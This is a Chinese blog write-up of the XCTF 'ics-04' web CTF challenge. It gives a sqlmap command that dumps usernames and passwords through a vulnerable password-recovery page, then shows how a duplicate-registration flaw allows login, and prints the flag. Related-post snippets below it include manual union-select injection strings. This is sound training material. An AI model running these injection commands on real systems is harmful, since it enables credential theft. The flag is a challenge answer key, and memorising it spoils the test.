[xctf]ics-04

最新推荐文章于 2023-11-08 19:42:58 发布
最新推荐文章于 2023-11-08 19:42:58 发布
阅读量4.3k 收藏 1
点赞数
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/alex_bean/article/details/95305846
版权

类型:web
网址:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4918
描述:工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag
一句话总结:sql注入、业务逻辑漏洞

过程:
有三个可以访问的功能,注册、登录和找回密码
注册功能:没有sql注入,一个账号可以重复注册漏洞
登录功能:没有sql注入,一个账号不同密码能够登录
找回密码功能:存在sql注入,payload:

python sqlmap.py -u "http://111.198.29.45:30842/findpwd.php" --data="username=1" -D cetc004 -T user -C "username,password" --dump

得到账号:c3tlwDmIn23,密码:2f8667f381ff50ced6a3edc259260ba9
利用重复注册账号漏洞,注册账号c3tlwDmIn23,密码123456,登录成功,取得flag
Flag:
cyberpeace{f806dac1f9e60f3b2bc4e610cb21d861}

胖胖のALEX
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XCTF-HW-pipeline附件
11-09
附件
「干货」XCTF Web安全入门练习靶场全部通关教程
橙留香Park的博客
04-13 6505
转移发布平台通知:将不再在CSDN博客发布新文章,敬请移步知识星球... ...
xctf新手区(附详细过程)
qq_39670065的博客
09-15 2412
攻防世界
XCTF-攻防世界-密码学crypto-新手练习区-writeup
Ryannn_的博客
10-23 9743
目录 0x00 base64 0x01 Caesar 0x02 Morse 0x03 Railfence 0x04 转轮机加密 0x05 easy_RSA 0x06 Normal_RSA 0x07 不仅仅是Morse 0x08 混合编码 0x09 easychallenge 0x0A easy_ECC 0x0B 幂数加密 0x00 base64 元宵节灯谜是一种古老的传...
xctf攻防世界 Web高手进阶区 unfinish
l8947943的博客
01-02 3959
1. 进入环境,查看页面 我的心情和这个图像一样懵逼,拿起dirsearch就是一顿乱扫。如图: 发现有register.php 2. 问题分析 登入register.php,注册相关账户并登录 直接吧usrname给显示出来了,也就是说,注册提交了usrname数据,然后又从数据库中查询了username并回显,那么问题就清晰了一丢丢,想办法通过username注入数据,在回显时候再执行。查了查相关的wp,这种方式叫做二次注入: 二次注入的原理,在第一次进行数据库插入数据的时候(注册时),仅
XCTF密码学(入门一)
weixin_46027889的博客
10-15 1545
XCTF密码学(入门一) 1.1题目:base64 1.2描述:元宵节灯谜是一种古老的传统民间观灯猜谜的习俗。 因为谜语能启迪智慧又饶有兴趣,灯谜增添节日气氛,是一项很有趣的活动。 你也很喜欢这个游戏,这不,今年元宵节,心里有个黑客梦的你,约上你青梅竹马的好伙伴小鱼, 来到了cyberpeace的攻防世界猜谜大会,也想着一展身手。 你们一起来到了小孩子叽叽喳喳吵吵闹闹的地方,你俩抬头一看,上面的大红灯笼上写着一些奇奇怪怪的 字符串,小鱼正纳闷呢,你神秘一笑,我知道这是什么了。 1.3附件:Y3liZXJwZ
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
XCTF-Mobile】新手练习区-04-easyjava.apk
08-04
题目:https://adworld.xctf.org.cn/task/task_list?type=mobile&number=6&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/easyjava
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF总决赛的赛制以及新型攻防赛题之探索
最新发布
m0_61101264的博客
11-08 329
这次比赛我也学到了很多,一方面是对题目的把控,我的引导性不够强,导致发展一度没有往我所预期的方向,另外一个忽略的部分就是这种交互提升的设计,应该需要加入明牌设计,双方能够部分获取到对方的信息,例如防守方的信息可以公开,这样加速针对性进化。其余就是实现上的一些细节了,这次由于测试不充分出了很多问题,这个就是经验了,下次应该就不会有了(不过或许下次我就不再写 AD 了。。。太容易出问题了)。最后希望各位高抬贵手吧,为了大家能够有玩的感觉,我花了好长时间去搜索资料寻找思路来设计,虽然最后表现不佳。。
XCTF攻防世界题目ics-04(XCTF 4th-CyberEarth)
daqiangdetianxia的博客
08-18 457
为了避免眼高手低,能用手工我决定把一些题目的详细思路和思考过程写一遍。就当是总结吧。 简单的一道sql注入题目加一个简单的逻辑漏洞。 信息搜集 页面:login.php,register.php,findpwd.php 服务器:Apache/2.4.7 (Ubuntu) ICS工业控制系统 漏洞查找 一、 经过测试,发现findpwd页面存在sql注入漏洞 二、手工注入 1.确定列数 admin1' order by 4#经过测试,一共有四列,其中admin1是我自己注册的用户。 2.确定注入列数. .
XCTF-攻防世界CTF平台-Reverse逆向类——1、Mysterious
Onlyone_1314的博客
08-20 797
目录标题方法1、直接拼凑得到flag方法2、逆向计算输入的字符串得到flag 先用PEiD查壳: 发现没有壳,程序是VC++编写的Win32 GUI程序。 运行程序: 是一个让我们输入密码的程序,输入123点击“Crack”按钮没有反应。 方法1、直接拼凑得到flag 用IDA反编译程序: VC++编写的Win32 GUI程序最开始是从start()函数开始,调用: 1、注册异常处理函数 2、调用GetVersion 获取版本信息 3、调用函数 __heap_init初始化堆栈 4、调用 __ioin
XCTF(攻防世界)—新手web题Write Up
Lemon's blog
07-10 2640
前言:之前一直没有接触过web这方面的题,这次利用暑假时光好好学习,web真的是很有趣,虽然有的题很简单,但可以学习到很多知识,话不多说,做题。
XCTF-攻防世界CTF平台-Reverse逆向类——57、re5-packed-movement(linux32位ELF文件、movfuscator代码混淆)
Onlyone_1314的博客
10-24 1931
目录标题方法一:搜索字节序列方法二:IDC脚本方法三:Python脚本:方法四:bgrep工具 先查看文件信息:   是linux下的32位ELF文件,且被加了UPX的壳   下载最新版的UPX脱壳,UPX脱壳的Githup地址:https://github.com/upx/upx/releases/tag/v3.91   之后脱壳,指定加壳文件57,输出脱壳文件57move upx -d 57 -o 57move 赋执行权限运行程序: 用IDA打开57move,找到字符串“Guess a flag
信息安全类-XCTF_OJ练习平台
山里樵夫俗称大叔
10-25 9287
资源网站名称:XCTF_OJ练习平台 网址:http://oj.xctf.org.cn/ 简介: XCTF-OJ (X Capture The Flag Online Judge)是由XCTF组委会组织开发并面向XCTF联赛参赛者提供的网络安全技术对抗赛练习平台。 XCTF-OJ平台将汇集国内外CTF网络安全竞赛的真题题库,并支持对部分可获取在线题目交互环境的重现恢复,XCTF联赛后续
xctf刷题随笔
qq_52974719的博客
07-26 256
XCTF-RE-hackme and BABYREhackmeBABYREdebug hackme 1、查壳 64位elf文件,拖入IDA中打开 2、IDA分析 函数窗口发现全是sub_开头,没有解析出函数名。 试着shift+f12查看字符串 发现give me the password字符串,根据调用,跟进函数。 分析函数逻辑,得出v7是我们的输入,即flag并且长度为22位,设定v6等于10,进行do while循环,可知主要操作是v15和v11异或后与同下标的v12进行比较,而v15的生成算法与v1
攻防世界web进阶区ics-04
gongjingege的博客
08-03 221
题目描述:工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。 考虑是否存在注入漏洞 只有三个地方可以点,登录,注册,忘记密码 先注册 普通用户登录没什么用,估计得管理员登录 登录和注册页面没有注入点,就忘记密码 测试后存在注入,1’or 1=1#绕过 手工测试,后台过滤了一部分,直接union select, 1’ union select 1,2,3,4# 页面回显正常 查询数据库 1’ union select 1,2,group_concat(schema_name),4 fr
XCTF-happyCtf
TA不懒,但还没有添加简介
04-03 244
XCTF-happyCtf
XCTF(攻防世界)
qq_63685461的博客
12-02 716
1.this_is_flag 属于是介绍flag长啥样子了 2.pdf 下载附件 啥也没有 pdf格式的尝试转为word 3.如来十三掌 下载附件一个word文档 看这格式一个佛曰加密得到MzkuM3gvMUAwnzuvn3cgozMlMTuvqzAenJchMUAeqzWenzEmLJW9 试了base没用,想不到了就查了一下这个是rot-13加密 得到一串base加密字符串解密得到flag flag{bdscjhbkzmnfrdhbvckijndskvbkjdsab} 4....
web-ics-05
07-28
- *1* *3* [xctf-web-ics05](https://blog.csdn.net/zhejichensha_l7l/article/details/113530046)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值